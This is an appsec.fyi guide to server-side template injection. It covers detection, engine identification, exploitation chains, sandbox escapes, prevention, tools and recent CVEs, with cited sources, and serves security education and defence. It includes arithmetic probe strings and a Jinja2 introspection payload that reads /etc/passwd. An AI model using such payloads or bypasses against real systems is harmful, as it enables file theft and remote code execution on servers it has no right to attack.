appsec.fyi

SSTI — A Practical Guide

A curated AppSec resource library covering XSS, SQLi, SSRF, IDOR, RCE, XXE, OSINT, and more.

SSTI: A Practical Guide

Curated and synthesized by . Last updated 2026-06-29. Synthesized from 98 of 98 curated resources. Browse all 98 SSTI resources →

Problem Framing

Server-Side Template Injection (SSTI) is a critical web security vulnerability that arises when untrusted user input is processed by a server-side templating engine without proper sanitization or validation [1][2][3][4][5][6][7][8][9]. Templating engines, ubiquitous in modern web development, are designed to dynamically generate content, such as HTML, emails, or configuration files, by combining static templates with dynamic data. When user input directly influences the template's structure or content, it can be leveraged to inject malicious template syntax. This syntax is then executed server-side by the templating engine, potentially leading to severe consequences, including information disclosure, unauthorized access, denial of service, and, most critically, remote code execution (RCE) [1][10][3][4][5][6][7][8][9]. Unlike Cross-Site Scripting (XSS), which targets the client's browser, SSTI attacks the server directly [2].

The core of the vulnerability lies in the misuse of template engines, where they are instructed to interpret data that should have been treated as literal text as executable code [2][4]. This often happens when developers concatenate user input directly into template strings or dynamically construct templates based on user-supplied values, bypassing the intended separation between data and logic [1][2][3][4][5][11][9]. Many template engines are powerful and feature-rich, offering capabilities like variable interpolation, expressions, filters, control structures, and object introspection, which attackers can exploit to achieve their goals [2].

The impact of SSTI can be profound. Attackers can gain a foothold on the server, leading to a complete compromise of the application and its underlying infrastructure. This can involve exfiltrating sensitive data such as credentials, API keys, or configuration files, escalating privileges, or even using the compromised server as a pivot point for further attacks within the network [10][3][4][5][6][7][8][9]. The severity of SSTI is directly tied to the capabilities of the templating engine and the permissions of the process running the application. In many cases, successful exploitation leads to RCE, allowing attackers to execute arbitrary operating system commands [1][2][10][3][4][5][6][7][8][9].

Core Mechanics

Server-Side Template Injection occurs when user-controlled data is integrated into a server-side template without sufficient sanitization or escaping, leading the template engine to interpret this data as executable code. The process can be broken down into several key phases:

Template Engine Interaction

Templating engines act as intermediaries, transforming template files into dynamic content. They interpret special syntax within templates, such as {{ variable }} or ${ expression }, to substitute placeholders with actual data or execute logic [2][10][3][11][12]. The vulnerability arises when user input directly replaces or is embedded within this template syntax, rather than being treated as inert data. For instance, if a template expects a username like Hello {{ username }}, and the application concatenates user input directly into this string, an attacker could provide {{ 7*7 }} as the username, causing the server to render Hello 49 [2][4][5][11]. This simple arithmetic evaluation is often the first indicator of an SSTI vulnerability [3][4][5][13][11][8][12].

Input Vectors

User input can enter the templating engine through various application points, including URL parameters, form fields, HTTP headers, cookies, or even file uploads [2][14][15][16][12]. Any part of the application that dynamically incorporates user-supplied data into a server-side template is a potential injection vector [14][12]. For example, an application might use user input to determine which template to render, or to populate variables within a fixed template structure [4][9].

Exploitation Chains

Once an injection point is identified, attackers typically follow a methodology:

1. Detection: This involves sending template syntax or mathematical expressions (e.g., {{77}}, ${77}, <%= 7*7 %>) to potential input points to see if they are evaluated server-side [2][3][14][5][13][8][12]. Error messages can also be instructive, sometimes revealing the template engine's identity [2][14][13][12]. 2. Identification: Determining the specific template engine (e.g., Jinja2, Twig, FreeMarker, ERB) is crucial, as syntax and available functions vary significantly [2][3][14][13][8][12]. This can often be achieved by observing how different payloads are processed or by triggering specific error messages [2][14][13][12]. 3. Exploitation: Once the engine is identified, attackers leverage its capabilities to achieve their objective. This often involves exploring available objects and methods, particularly those that provide access to the underlying operating system or file system. Common techniques include accessing built-in functions for command execution or file manipulation, often through introspection of Python objects (__class__, __mro__, __subclasses__) or Java reflection [2][4][5][17][11][16][18][19]. 4. Sandbox Escapes: Many template engines offer sandboxing mechanisms to restrict potentially dangerous operations. Exploiting SSTI in a sandboxed environment requires finding ways to bypass these restrictions, often by abusing specific engine features or identifying flaws in the sandbox implementation [20][21][22][23][17][24][25][26][27][28][12].

The overall process relies on understanding how the specific template engine handles input and what functionalities it exposes to the template context.

Notable Techniques

The exploitation of SSTI vulnerabilities is highly dependent on the specific templating engine and the surrounding application's configuration. However, several common techniques and patterns emerge:

Object Introspection and Method Chaining

A prevalent technique, particularly in Python-based engines like Jinja2, involves navigating the object inheritance tree to access powerful built-in functionalities. By starting from a common object (e.g., an empty string ''), attackers can use attributes like __class__, __mro__, and __subclasses__ to discover and access classes and their methods, including those related to operating system interaction (os module) or file I/O (io._IOBase, io.FileIO) [4][17][11][16][18][19]. This allows for executing arbitrary commands or reading sensitive files.

For example, a Jinja2 payload might look like:

{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}

This payload, assuming the _io.FileIO class is at index 40 of the __subclasses__ list, reads the /etc/passwd file [17][18]. Similarly, accessing the os.popen function via class introspection enables command execution [4][11][16][18].

Sandbox Escapes

Many template engines implement sandboxes to limit the functionality available to templates, preventing direct access to dangerous methods like os.system. However, these sandboxes are not always foolproof. Techniques for bypassing them include:

Filter Bypasses and Obfuscation

When direct access to attributes or keywords is blocked by blacklists, attackers employ various obfuscation techniques:

Time-Based and Blind SSTI

In scenarios where output is not directly reflected, attackers can use time-based payloads (e.g., sleep 5) to infer vulnerability by measuring response delays [14][13][39][9]. Boolean-based techniques involve crafting payloads that result in different responses (or errors) based on a condition, allowing for byte-by-byte data exfiltration [14][13][39][9].

Detection and Prevention

The secure implementation of templating engines is paramount to preventing SSTI vulnerabilities. The primary defense revolves around strictly managing user input and leveraging the security features provided by the engines themselves.

Secure Coding Practices

The most effective way to prevent SSTI is to avoid processing untrusted user input directly within template strings or logic. Instead, user input should be treated as data and passed to templates as parameters, ensuring that the template engine always receives sanitized and properly escaped values [1][2][3][5][11][40][9].

Leveraging Template Engine Security Features

Template engines often provide mechanisms to mitigate SSTI risks:

Defense in Depth

Beyond secure coding practices, a layered security approach provides additional protection:

Tooling

Several tools are invaluable for detecting and exploiting SSTI vulnerabilities, streamlining the process for security professionals.

Automated SSTI Detection and Exploitation Tools

Burp Suite Extensions

Fuzzing and Reconnaissance Tools

These tools significantly reduce the manual effort required for SSTI testing, allowing security professionals to identify and exploit these vulnerabilities more efficiently.

Recent Developments

The landscape of Server-Side Template Injection continues to evolve, with new vulnerabilities and bypass techniques being discovered regularly. Recent trends highlight the ongoing challenges in securing template engine implementations and the sophistication of exploitation methods.

Complex Sandbox Escapes and Filter Bypasses

Attackers are continually developing more intricate methods to bypass sandboxing mechanisms and filter lists within templating engines. These often involve deep introspection of object models, novel string manipulation techniques, and leveraging obscure engine features. For instance, research has shown how to bypass common blacklists in Jinja2 by using alternative attribute access methods, hexadecimal encoding, or string concatenation and joining functions [34][35][16][18]. Similarly, sophisticated bypasses have been demonstrated for FreeMarker by exploiting functions like ?lower_abc to encode restricted characters, thereby constructing RCE payloads despite input filters [27].

SSTI in Newer Frameworks and Languages

While SSTI is well-documented in mature languages like Python, Java, and PHP, recent research has focused on its prevalence and exploitation in less commonly studied environments. For example, there's growing attention on SSTI vulnerabilities in Go applications, where exploiting the html/template or text/template packages can lead to RCE by abusing method calls or insecurely exposed functionalities [48][49][50][51]. Additionally, vulnerabilities continue to be found in popular platforms and specific components, such as CVEs affecting Atlassian Confluence, ServiceNow, Grav CMS, and Spring Boot applications [20][52][53][54][55][56][57][58][59][60][25][26][30].

Chaining Vulnerabilities

SSTI is often chained with other vulnerabilities to achieve more impactful results. For example, a path traversal vulnerability might enable an attacker to control the template file path, leading to SSTI and subsequent RCE [61]. In other cases, a broken access control flaw could allow an authenticated user to modify template content, facilitating SSTI exploitation [20][22].

Research into Unconventional Payload Construction

Advanced techniques involve constructing payloads without relying on direct quotation marks or external resources, instead using inherent language features, object chains, or even specific template syntax constructs like Twig's block feature to bypass strict filtering [62][18]. The discovery of vulnerabilities related to Abstract Syntax Tree (AST) injection in JavaScript template engines like Handlebars and Pug demonstrates an evolving threat landscape where even the parsing process can be manipulated [63].

These developments underscore the need for continuous vigilance, deep understanding of templating engine internals, and robust security measures to counter the evolving SSTI threat.

Where to Go Deeper

For practitioners seeking to deepen their understanding and practical skills in Server-Side Template Injection, a wealth of resources exists. This includes detailed research papers, interactive labs, comprehensive cheat sheets, and specialized tooling.

Key Resources and References

Tools for Practice and Exploitation

By immersing oneself in these resources, practitioners can build a deep understanding of SSTI, from its fundamental mechanics to advanced exploitation techniques and effective mitigation strategies.

Sources cited in this guide

  1. SSTI: Explanation, Discovery, Exploitation, and Prevention — akto.io
  2. SSTI: Breaking Out of Templates — kayssel.com
  3. Inj3ctlab — SSTI Bug Bounty Labs Writeup — len4m.github.io
  4. What is SSTI in Flask/Jinja2? — Payatu — payatu.com
  5. Find and Exploit Server-Side Template Injection — TCM Security — tcm-sec.com
  6. What is Server-Side Template Injection? (Indusface) — indusface.com
  7. A Pentester's Guide to SSTI - Cobalt — cobalt.io
  8. OWASP Testing for Server Side Template Injection — owasp.org
  9. Server-side template injection | Web Security Academy — portswigger.net
  10. A Survey of the Overlooked Dangers of Template Engines (arXiv 2024) — arxiv.org
  11. SSTI Explained with Real Code Examples - Xygeni — xygeni.io
  12. Server-Side Template Injection | PortSwigger Research — portswigger.net
  13. Server Side Template Injection - Payloads All The Things — swisskyrepo.github.io
  14. PayloadsAllTheThings — SSTI README — github.com
  15. ruby-ssti: example Ruby ERB app vulnerable to SSTI — github.com
  16. Flask & Jinja2 SSTI cheatsheet — pequalsnp-team.github.io
  17. A Simple Flask (Jinja2) SSTI Example (Kleiber) — kleiber.me
  18. HackTricks: Jinja2 SSTI — book.hacktricks.xyz
  19. Exploiting server-side template injection vulnerabilities — portswigger.net
  20. Grav CMS Twig SSTI Authenticated Sandbox Bypass RCE — rapid7.com
  21. Grav CMS: Security Sandbox Bypass with SSTI — github.com
  22. Grav CMS: RCE via SSTI through Twig Sandbox Bypass — github.com
  23. Exploiting CVE-2021-25770: SSTI in YouTrack (Synacktiv) — synacktiv.com
  24. SSTI - Server-side template injection with a custom exploit (Scott Murray) — sc.scomurr.com
  25. Grav: SSTI via Twig escape handler advisory — github.com
  26. CVE-2023-49964: FreeMarker SSTI in Alfresco — github.com
  27. Synack: Discovering an SSTI vulnerability in FreeMarker — synack.com
  28. Template Injection Research | PortSwigger Research — portswigger.net
  29. GoSecure: Template Injection in Action workshop — gosecure.github.io
  30. GitHub Security Lab: SSTI in Apache Camel — CVE-2020-11994 — securitylab.github.com
  31. SSTI in Jinja2 allows RCE (changedetection.io) — github.com
  32. Exploiting SSTI in Thymeleaf — acunetix.com
  33. Exploiting SSTI in a Modern Spring Boot Application — modzero.com
  34. Jinja2 template injection filter bypasses (0day.work) — 0day.work
  35. Jinja2/Flask SSTI Filter bypass (MRLSECURITY) — mrlsecurity.com
  36. SSTI (The Hacker Recipes) — thehacker.recipes
  37. CVE-2025-23211: Jinja2 SSTI Turns Recipes Into RCE — vsec.com.br
  38. Jinja2 SSTI filter bypasses — medium.com
  39. SSTI: Transforming Web Apps from Assets to Liabilities — research.checkpoint.com
  40. Server-side template injection PortSwigger KB — portswigger.net
  41. Handlebars.js: Safe Usage to Avoid Injection Flaws — xygeni.io
  42. OpenMetadata: FreeMarker SSTI in email templates leads to RCE — github.com
  43. tplmap-python3: Python3 port (GitHub) — github.com
  44. Tplmap - Tool For Automatic SSTI Exploitation (GeeksforGeeks) — geeksforgeeks.org
  45. vladko312/SSTImap: Automatic SSTI detection tool with interactive interface — github.com
  46. epinna/tplmap: SSTI and Code Injection Detection and Exploitation Tool — github.com
  47. PayloadsAllTheThings: Server Side Template Injection — github.com
  48. Method Confusion in Go SSTIs Lead to RCE — onsecurity.io
  49. Exploiting SSTI in Golang Frameworks — payatu.com
  50. Golang SSTI: Safe by Default or Vulnerable by Design — oligo.security
  51. Bug Bytes #124: SSTI to RCE in Go apps (Intigriti) — blog.intigriti.com
  52. Active Exploitation of Confluence CVE-2022-26134 (Rapid7) — rapid7.com
  53. Atlassian Confluence Widget Connector Macro SSTI (ExploitDB) — exploit-db.com
  54. Strapi Security Disclosure: Multi-CVE SSTI chain — strapi.io
  55. CVE-2022-46166: Spring Boot Admin RCE — sangfor.com
  56. CVE-2021-43466: Thymeleaf Spring5 RCE — security.snyk.io
  57. SpringBootAdmin Thymeleaf SSTI to RCE — github.com
  58. ServiceNow RCE Exploitation Campaign — resecurity.com
  59. Multiple ServiceNow SSTI Vulnerabilities — censys.com
  60. ServiceNow RCE (CVE-2024-4879) Analysis — cyfirma.com
  61. CVE-2026-27641: Flask-Reuploaded Path Traversal Enabling SSTI RCE — github.com
  62. YesWeHack: Limitations are just an illusion — advanced SSTI exploitation with RCE everywhere — yeswehack.com
  63. AST Injection: Prototype Pollution to RCE in Handlebars — po6ix.github.io
  64. SSTI: RCE for the Modern Web App - Black Hat 2015 — blackhat.com
  65. HackTricks: SSTI (Server Side Template Injection) — book.hacktricks.xyz
  66. Don't Panic: The Thymeleaf Template Injection That Only Hurts If You Let It (CVE-2026-40478) — snyk.io
  67. SSTI: Advanced Exploitation Guide - Intigriti — intigriti.com
  68. CVE-2025-23211: Tandoor Recipes Jinja2 SSTI to RCE — offsec.com
  69. picoCTF 2025: SSTI2 Exploitation Writeup — medium.com
  70. picoCTF 2025: SSTI Challenge Writeup — medium.com
📚 This guide is synthesized from the full text of resources curated in the SSTI library, and refreshed as new material is added.